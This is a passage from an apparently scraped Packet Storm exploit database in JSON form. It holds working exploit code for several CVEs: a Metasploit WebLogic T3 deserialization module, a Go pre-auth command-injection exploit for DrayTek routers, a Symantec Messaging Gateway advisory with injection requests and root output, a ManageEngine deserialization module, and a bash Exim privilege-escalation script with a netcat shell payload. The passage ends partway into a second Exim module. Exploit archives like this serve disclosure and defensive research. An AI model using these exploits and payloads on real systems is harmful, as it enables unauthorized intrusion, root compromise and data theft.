\ndata << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized \n \ndata << '00000000' # NULL BYTES \ndata << '78' # block footer \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef send_payload_objdata \n# payload creation \nif target.name == 'Windows' \nmycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) \nelsif target.name == 'Unix' || target.name == 'Solaris' \nmycmd = payload.encoded \nend \n \n# basic weblogic ClassTableEntry object (serialized) \n# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT? \npayload = '056508000000010000001b0000005d0101007372017870737202787000000000' \npayload << '00000000757203787000000000787400087765626c6f67696375720478700000' \npayload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \npayload << '00025b42' # Name: 0x5b42 \npayload << 'acf317f8060854e0' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # 
EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \n \npayload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; \npayload << '6563743b' # (cont) \npayload << '90ce589f1073296c' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \n \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # SERIALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '72' # class header \npayload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector \npayload << 'd9977d5b803baf01' # serialVersionUID \npayload << '03' # WRITE_METHOD | SERIALIZABLE \npayload << '0003' # fieldCount = 3 \npayload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement \npayload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount \npayload << '5b000b656c656d656e7444617461' # 2: Array: elementData \npayload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; \npayload << '743b' # (cont) \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \nysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(\"CommonsCollections1\",mycmd) \npayload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join \n \npayload << 
'fe010000' # ----- separator ----- \n \n# basic weblogic ImmutableServiceContext object (serialized) \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext \npayload << '7461626c6553657276696365436f6e74657874' # (cont) \npayload << 'ddcba8706386f0ba' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '78' # object footer \npayload << '72' # block header \npayload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext \npayload << '696465722e426173696353657276696365436f' # (cont) \npayload << '6e74657874' # (cont) \npayload << 'e4632236c5d4a71e' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '77' # block header \npayload << '020600' # contents = 0x0600 \npayload << '7372' # class descriptor \npayload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor \npayload << '726e616c2e4d6574686f644465736372697074' # (cont) \npayload << '6f72' # (cont) \npayload << '12485a828af7f67b' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # class data \n \n#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765 \n#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c \n#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b \npayload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized \npayload << '78' # class footer \npayload << '78' # block footer \n# MISSING OBJECT FOOTER (0x78) \n \npayload << 'fe00ff' # this cruft again. 
some kind of footer \n \n# sets the length of the stream \ndata = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') \ndata << payload \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \n \nend \n \ndef exploit \nconnect \n \nprint_status('Sending handshake...') \nt3_handshake \n \nprint_status('Sending T3 request object...') \nbuild_t3_request_object \n \nprint_status('Sending client object payload...') \nsend_payload_objdata \n \nhandler \ndisconnect \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152268/weblogic_deserialize_rawobject.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-01T02:16:44", "description": "", "published": "2020-03-31T00:00:00", "type": "packetstorm", "title": "DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-8515"], "modified": "2020-03-31T00:00:00", "id": "PACKETSTORM:156979", "href": "https://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html", "sourceData": "`package main \n \n \n/* \nCVE-2020-8515: DrayTek pre-auth remote root RCE \nMon Mar 30 2020 - 0xsha.io \nAffected: \nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, \nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, \nand 1.4.4_Beta \nYou should upgrade as soon as possible to 1.5.1 firmware or later \nThis issue has been fixed in Vigor3900/2960/300B v1.5.1. 
\nread more : \nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html \nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ \nhttps://thehackernews.com/2020/03/draytek-network-hacking.html \nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ \nexploiting using keyPath \nPOST /cgi-bin/mainfunction.cgi HTTP/1.1 \nHost: 1.2.3.4 \nContent-Length: 89 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \n*/ \n \nimport ( \n\"fmt\" \n\"io/ioutil\" \n\"net/http\" \n\"net/url\" \n\"os\" \n\"strings\" \n) \n \nfunc usage() { \n \nfmt.Println(\"CVE-2020-8515 exploit by @0xsha \") \nfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" ) \nfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" ) \n} \n \nfunc main() { \n \n \nif len(os.Args) < 3 { \nusage() \nos.Exit(-1) \n} \n \ntargetUrl := os.Args[1] \n//cmd := \"cat /etc/passwd\" \ncmd := os.Args[2] \n \n \n// payload preparation \nvulnerableFile := \"/cgi-bin/mainfunction.cgi\" \n// specially crafted CMD \n// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \npayload :=`' \n/bin/sh -c 'CMD' \n'` \npayload = strings.ReplaceAll(payload,\"CMD\", cmd) \nbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\") \n \n//PostForm call url encoder internally \nresp, err := http.PostForm(targetUrl+vulnerableFile , \nurl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} }) \n \nif err != nil{ \nfmt.Println(\"error connecting host\") \nos.Exit(-1) \n} \n \n \ndefer resp.Body.Close() \nbody, err := ioutil.ReadAll(resp.Body) \n \nif err != nil{ \nfmt.Println(\"error reading data\") \nos.Exit(-1) \n} \n \nfmt.Println(string(body)) \n \n} 
\n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156979/draytek-exec.txt"}, {"lastseen": "2017-08-22T15:20:25", "description": "", "published": "2017-08-18T00:00:00", "type": "packetstorm", "title": "Symantec Messaging Gateway 10.6.3-2 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6327"], "modified": "2017-08-18T00:00:00", "id": "PACKETSTORM:143821", "href": "https://packetstormsecurity.com/files/143821/Symantec-Messaging-Gateway-10.6.3-2-Remote-Code-Execution.html", "sourceData": "`Hello, \n \nThis is an advisory for CVE-2017-6327 which is an unauthenticated remote \ncode execution flaw in the web interface of Symantec Messaging Gateway \nprior to and including version 10.6.3-2, which can be used to execute \ncommands as root. \n \nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based \nanti-spam/security product for e-mail servers. It is deployed as a physical \ndevice or with ESX in close proximity to the servers it is designed to \nprotect. \n \n=*=*=*=*=*=*=*=*= TIMELINE \n \n2017-07-07: Reported to Symantec \n2017-08-10: Patch and notice released by Symantec [1] \n2017-08-18: Public technical advisory \n \n=*=*=*=*=*=*=*=*= DESCRIPTION \n \n- Bug #1: Web authentication bypass \n \nThe web management interface is available via HTTPS, and you can't do much \nwithout logging in. \n \nIf the current session (identified by the `JSESSIONID` cookie) has the \n`user` attribute set, the session is considered authenticated. \n \nThe file LoginAction.class defines a number of public methods and they can \nall be reached via unauthenticated web requests. \n \nBy making a GET request to `/brightmail/action1.do?method=method_name` we \ncan execute `LoginAction.method_name` if `method_name` is a public method. \n \nOne such public method which will be the target of our authentication \nbypass is called `LoginAction.notificationLogin`. 
\n \nIt does the following: \n \n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt` \n2. Creates a new `UserTO` object using the decrypted `notify` parameter as \nan email value \n3. Creates a new session, invalidating the old one if necessary \n4. Sets the `user` attribute of the newly created session to our \nconstructed UserTO object \n \nIt essentially takes a username value from a GET parameter and logs you in \nas this user if it exists. If not, it creates this user for you. \n \nWe need to encrypt our `notify` argument so that \n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the \nencryption is just PBEWithMD5AndDES using a static password, conveniently \nincluded in the code itself. I won't include the encryption password or a \nfully encrypted notify string in this post. \n \n \nExample request: \n \nGET \n/brightmail/action1.do?method=notificationLogin¬ify=MTIzNDU2Nzg%3d6[...]&id=test \nHTTP/1.1 \n... \n \n \nHTTP/1.1 302 Found \nServer: Apache-Coyote/1.1 \n... \nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail; \nSecure; HttpOnly \n \n \n- Bug #2: Command injection \n \nThe RestoreAction.performRestore method can be reached with an \nauthenticated session and it takes the restoreSource and \nlocalBackupFilename parameters. \n \nAfter a long chain of function calls, localBackupFilename ends up being \nsent to the local \"bmagent\" daemon listening on port 41002. It will execute \n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied \nvalue. \n \nThe db-restore script is a sudo wrapper for \n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl \nscript containing a command injection in a call to /usr/bin/du. 
\n \n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";' \n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory \nsh: uid=0(root) gid=0(root) groups=0(root): command not found \nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file \nor directory \n \n \nThis command injection can be exploited from the web management interface \nwith a valid session, which we can create using bug #1. \n \n- Combining bug #1 and #2 \n \nThe last step is to get a CSRF token since the vulnerable performRestore \nfunction is annotated with @CSRF. \n \nAfter some quick digging it turns out that all you need to do is call \n/brightmail/common.jsp to get a token that will be valid for all your \nrequests. \n \nThe URL-encoded value we provide for the `localBackupFileSelection` \nparameter is: \nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname \n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe \n \nRequest: \n \nGET \n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65 \nHTTP/1.1 \nHost: 192.168.205.220 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) \nGecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \nResponse: \n \nHTTP/1.1 200 OK \nServer: Apache-Coyote/1.1 \nCache-Control: no-store,no-cache \nPragma: no-cache \nExpires: Thu, 
01 Jan 1970 00:00:00 GMT \nX-Frame-Options: SAMEORIGIN \nContent-Type: text/html;charset=UTF-8 \nContent-Length: 803 \nDate: Thu, 29 Jun 2017 06:48:12 GMT \nConnection: close \n \n<HTML> \n<title>Symantec Messaging Gateway - Restore</title> \n... \n \n \nNow to confirm that our command output was correctly placed in a file \ninside the webroot. \n \nimac:~% curl -k https://192.168.205.220/brightmail/output.txt \nuid=0(root) gid=0(root) groups=0(root) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT \n \nimac:~/brightmail% python brightmail-rce.py \nhttps://192.168.205.220/brightmail \nbypassing login.. \n* JSESSIONID=693079639299816F80016123BE8A0167 \nverifying login bypass.. \n* Version: 10.6.3 \ngetting csrf token.. \n* 1e35af8c567d3448a65c8516a835cec30b6b8b73 \ndone, verifying.. \n \nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root) \ngroups=0(root),99(nobody),499(mysql),502(bcc) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n# cat /etc/issue \n \nSymantec Messaging Gateway \nVersion 10.6.3-2 \nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved. 
\n \n \n=*=*=*=*=*=*=*=*= REFERENCES \n \n[1] \nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 \n \n=*=*=*=*=*=*=*=*= CREDIT \n \nPhilip Pettersson \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143821/symantecmg-exec.txt"}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. 
In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 
\n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# 
Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-18T11:49:32", "description": "", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "PACKETSTORM:153312", "href": "https://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/bash \n \n# \n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit \n# Copyright (c) 2019 Marco Ivaldi 
<raptor@0xdeadbeef.info> \n# \n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution. \n# (CVE-2019-10149) \n# \n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team. \n# \n# Credits: \n# Qualys Security Advisory team (kudos for your amazing research!) \n# Dennis 'dhn' Herrmann (/dev/tcp technique) \n# \n# Usage (setuid method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m setuid \n# Preparing setuid shell helper... \n# Delivering setuid payload... \n# [...] \n# Waiting 5 seconds... \n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Usage (netcat method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m netcat \n# Delivering netcat payload... \n# Waiting 5 seconds... \n# localhost [127.0.0.1] 31337 (?) 
open \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Vulnerable platforms: \n# Exim 4.87 - 4.91 \n# \n# Tested against: \n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] \n# \n \nMETHOD=\"setuid\" # default method \nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost' \nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' \n \n# usage instructions \nfunction usage() \n{ \necho \"$0 [-m METHOD]\" \necho \necho \"-m setuid : use the setuid payload (default)\" \necho \"-m netcat : use the netcat payload\" \necho \nexit 1 \n} \n \n# payload delivery \nfunction exploit() \n{ \n# connect to localhost:25 \nexec 3<>/dev/tcp/localhost/25 \n \n# deliver the payload \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho \"rcpt to:<$PAYLOAD>\" >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in {1..31} \ndo \necho \"Received: $i\" >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n} \n \n# print banner \necho \necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit' \necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' \necho \n \n# parse command line \nwhile [ ! -z \"$1\" ]; do \ncase $1 in \n-m) shift; METHOD=\"$1\"; shift;; \n* ) usage \n;; \nesac \ndone \nif [ -z $METHOD ]; then \nusage \nfi \n \n# setuid method \nif [ $METHOD = \"setuid\" ]; then \n \n# prepare a setuid shell helper to circumvent bash checks \necho \"Preparing setuid shell helper...\" \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c \ngcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null \nif [ $? 
-ne 0 ]; then \necho \"Problems compiling setuid shell helper, check your gcc.\" \necho \"Falling back to the /bin/sh method.\" \ncp /bin/sh /tmp/pwned \nfi \necho \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_SETUID \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nls -l /tmp/pwned \n/tmp/pwned \n \n# netcat method \nelif [ $METHOD = \"netcat\" ]; then \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_NETCAT \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nnc -v 127.0.0.1 31337 \n \n# print help \nelse \nusage \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/153312/raptor_exim_wiz.sh.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-24T22:40:27", "description": "", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "PACKETSTORM:154198", "href": "https://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'expect' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). 
\nImproper validation of recipient address in deliver_message() \nfunction in /src/deliver.c may lead to command execution with root privileges \n(CVE-2019-10149). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and PoC (@qualys) \n'Dennis Herrmann', # Working exploit (@dhn) \n'Marco Ivaldi', # Working exploit (@0xdea) \n'Guillaume Andr\u00e9' # Metasploit module (@yaumn_) \n], \n'DisclosureDate' => '2019-06-05', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Exim 4.87 - 4.91', \nlower_version: Gem::Version.new('4.87'), \nupper_version: Gem::Version.new('4.91') \n] \n], \n'DefaultOptions' => \n{ \n'PrependSetgid' => true, \n'PrependSetuid' => true \n}, \n'References' => \n[ \n[ 'CVE', '2019-10149' ], \n[ 'EDB', '46996' ], \n[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] \n] \n)) \n \nregister_options( \n[ \nOptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), 